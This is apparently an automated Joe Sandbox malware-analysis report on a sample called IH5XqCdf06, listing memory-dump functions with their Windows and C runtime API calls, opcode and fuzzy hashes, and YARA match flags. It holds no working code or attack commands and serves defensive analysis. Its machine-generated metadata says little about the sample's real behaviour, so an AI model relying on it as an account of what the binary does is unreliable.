                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                    • String ID:
                                                                                                    • API String ID: 4284812201-0
                                                                                                    • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                    • Instruction ID: f311787c3701eaa1743263fba4779949472cef0799677b30ae1dccf8b14dfa71
                                                                                                    • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                    • Instruction Fuzzy Hash: 42F02430600308A7EF947BB408626BD31A76F82315F04017DBD519F3C1CE718D0992A8
                                                                                                    APIs
                                                                                                    • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0065378C
                                                                                                      • Part of subcall function 00652B16: ___crtGetTimeFormatEx.LIBCMT ref: 00652B2C
                                                                                                      • Part of subcall function 00652B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00652B4B
                                                                                                    • GetLastError.KERNEL32 ref: 006537A8
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006537BE
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 006537CC
                                                                                                      • Part of subcall function 006528EC: SetThreadPriority.KERNEL32(?,?), ref: 006528F8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                    • String ID:
                                                                                                    • API String ID: 1674182817-0
                                                                                                    • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                    • Instruction ID: 16ccc6de1dc88d246abcd0e60c99c532ec05b2d6f574fe4d35d4b58c498cfc1b
                                                                                                    • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                    • Instruction Fuzzy Hash: F1F0A7B2A002263AD760B7759C07FBB369D9B01B52F50092EBD05E7182FD98D40882BC
                                                                                                    APIs
                                                                                                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0065D088
                                                                                                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0065D0AC
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0065D0BF
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0065D0CD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                    • String ID:
                                                                                                    • API String ID: 3657713681-0
                                                                                                    • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                    • Instruction ID: 29542afde28e0044f5ffd501d710e219e32b942af109af4b490f89ccd2d0cb5f
                                                                                                    • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                    • Instruction Fuzzy Hash: 59F05931A00204A7C734FF10D842CAEB37B8E90B16F60852EEC05172C6DF71AA0EC665
                                                                                                    APIs
                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3803302727-0
                                                                                                    • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                    • Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
                                                                                                    • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                    • Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768
                                                                                                    APIs
                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0065286F
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00658830,?,?,?,?,00000000,?,00000000), ref: 0065287E
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00652894
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 006528A2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3803302727-0
                                                                                                    • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                    • Instruction ID: 83b0f63030692a604e4ee4d15e4aafde8fe39f40a2d18137430cdf0304b0e6bf
                                                                                                    • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                    • Instruction Fuzzy Hash: 5FF0A03460010ABBCF10EFF4CD46EEF37B96B01702F600614B910E20A1DB35DA089768
                                                                                                    APIs
                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 00645A83
                                                                                                    • __Cnd_signal.LIBCPMT ref: 00645A8F
                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 00645AA4
                                                                                                    • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00645AAB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                    • String ID:
                                                                                                    • API String ID: 2059591211-0
                                                                                                    • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                    • Instruction ID: 2a0a3d80d0333ce1efc46814cfb5413e3a1fb4a417507024c8d64fa65be48cd7
                                                                                                    • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                    • Instruction Fuzzy Hash: 5CF0A031400700AFEBA17B70D80771A73A3AF02329F14892DF0555A9A2CF7AEC54865D
                                                                                                    APIs
                                                                                                    • ___crtCreateEventExW.LIBCPMT ref: 0041232C
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                    • String ID:
                                                                                                    • API String ID: 200240550-0
                                                                                                    • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                    • Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
                                                                                                    • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                    • Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC
                                                                                                    APIs
                                                                                                    • ___crtCreateEventExW.LIBCPMT ref: 00652593
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00650DA0), ref: 006525A1
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006525B7
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 006525C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                    • String ID:
                                                                                                    • API String ID: 200240550-0
                                                                                                    • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                    • Instruction ID: 29ec3673585823f33a98edfbf55bd0c76734e53c2bc9059eecd74252bed3dec9
                                                                                                    • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                    • Instruction Fuzzy Hash: 23E0D86160021629E750B7748C13FBF369C5B01B42F840959BD14E21C3FE94E50841B8
                                                                                                    APIs
                                                                                                      • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                    • TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
                                                                                                    • GetLastError.KERNEL32 ref: 00423991
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3735082963-0
                                                                                                    • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                    • Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
                                                                                                    • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                    • Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
                                                                                                    APIs
                                                                                                      • Part of subcall function 00652959: TlsAlloc.KERNEL32(?,00650DA0), ref: 0065295F
                                                                                                    • TlsAlloc.KERNEL32(?,00650DA0), ref: 00663BE6
                                                                                                    • GetLastError.KERNEL32 ref: 00663BF8
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00663C0E
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00663C1C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3735082963-0
                                                                                                    • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                    • Instruction ID: dbe39e9c94fac8f8cc5b8a0a3efc3abfca37d2f20a27198a9ad19c6fce6f7eb0
                                                                                                    • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                    • Instruction Fuzzy Hash: 1FE061745003126FC340BB755C5767E32656A01343F100E2EF421D32D2EE34D109475C
                                                                                                    APIs
                                                                                                    • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3016159387-0
                                                                                                    • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                    • Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
                                                                                                    • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                    • Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C
                                                                                                    APIs
                                                                                                    • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00650DA0), ref: 0065279E
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00650DA0), ref: 006527AD
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006527C3
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 006527D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3016159387-0
                                                                                                    • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                    • Instruction ID: 273ae36d1e41afd185352f7785c61833781ef7fd9cef10354db847bf2f56d22f
                                                                                                    • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                    • Instruction Fuzzy Hash: 54E0867460010BABCB10FBB5DD4AEEF73BD6A01B02F600569B911E3151EB68EB0C8779
                                                                                                    APIs
                                                                                                    • SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                    • GetLastError.KERNEL32 ref: 0041269D
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4286982218-0
                                                                                                    • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                    • Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
                                                                                                    • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                    • Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C
                                                                                                    APIs
                                                                                                    • TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 1964976909-0
                                                                                                    • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                    • Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
                                                                                                    • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                    • Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C
                                                                                                    APIs
                                                                                                    • SetThreadPriority.KERNEL32(?,?), ref: 006528F8
                                                                                                    • GetLastError.KERNEL32 ref: 00652904
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0065291A
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00652928
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4286982218-0
                                                                                                    • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                    • Instruction ID: 17b156c48f0886179db9a20b84f019466c6c96b0ae05d7b3afbd174b0014e412
                                                                                                    • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                    • Instruction Fuzzy Hash: EAE0863460010A6BCB14BF71CC06BBF376D6B01742F500929BC15D21A2EF35D508879C
                                                                                                    APIs
                                                                                                    • TlsSetValue.KERNEL32(?,00000000,00657BD8,00000000,?,?,00650DA0,?,?,?,00000000,?,00000000), ref: 006529BE
                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 006529CA
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006529E0
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 006529EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 1964976909-0
                                                                                                    • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                    • Instruction ID: 710acce987186f6d098ccc0570f81974d9a9ddf4caf66e3bbfe2f88320c03bd8
                                                                                                    • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                    • Instruction Fuzzy Hash: 0BE0863520010A6BDB10BF71CC0ABBF376D6F01B42F500929BD19E21A2EF35D51897AC
                                                                                                    APIs
                                                                                                    • TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                    • GetLastError.KERNEL32 ref: 00412705
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3103352999-0
                                                                                                    • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                    • Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
                                                                                                    • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                    • Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
                                                                                                    APIs
                                                                                                    • TlsAlloc.KERNEL32(?,00650DA0), ref: 0065295F
                                                                                                    • GetLastError.KERNEL32 ref: 0065296C
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00652982
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00652990
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3103352999-0
                                                                                                    • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                    • Instruction ID: 56457188aa8ed9f69f051bd3aef6d85eb27128e5d1f9747d7dd79abd55faf1e7
                                                                                                    • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                    • Instruction Fuzzy Hash: 92E0CD30100106578714B7755C4AABF32696A02712F540B19F461D31E1EA64D40C429C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4g$4g
                                                                                                    • API String ID: 0-2161647026
                                                                                                    • Opcode ID: bf95e4150e32a6e9ea6774710a4b4db1b4b3c7664687a00a569d7bbf22ea1fa4
                                                                                                    • Instruction ID: 12f799f7bf99fb5379ddb641931432232e952e2277d2cdcc84d0e9423257eb3c
                                                                                                    • Opcode Fuzzy Hash: bf95e4150e32a6e9ea6774710a4b4db1b4b3c7664687a00a569d7bbf22ea1fa4
                                                                                                    • Instruction Fuzzy Hash: A251D531A04246EBCB30DF54C8A2BAA7772FF15310F65C15AD55DAB391E2709A82C785
                                                                                                    APIs
                                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ACP$OCP
                                                                                                    • API String ID: 0-711371036
                                                                                                    • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                    • Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
                                                                                                    • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                    • Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
                                                                                                    APIs
                                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0067B32B,?,00000050,?,?,?,?,?), ref: 0067B1AB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ACP$OCP
                                                                                                    • API String ID: 0-711371036
                                                                                                    • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                    • Instruction ID: 2e0a8d69418b653110ab66608ecdc4ae95175cd1c84376aa45f4322b990573a1
                                                                                                    • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                    • Instruction Fuzzy Hash: 08216D62A10105A6EB24CE648D12BE763ABEF64B61F9AD464E90DD7304E732DD41C394
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 0043490B
                                                                                                    • GetFileType.KERNEL32(00000000), ref: 0043491D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileHandleType
                                                                                                    • String ID: xYn
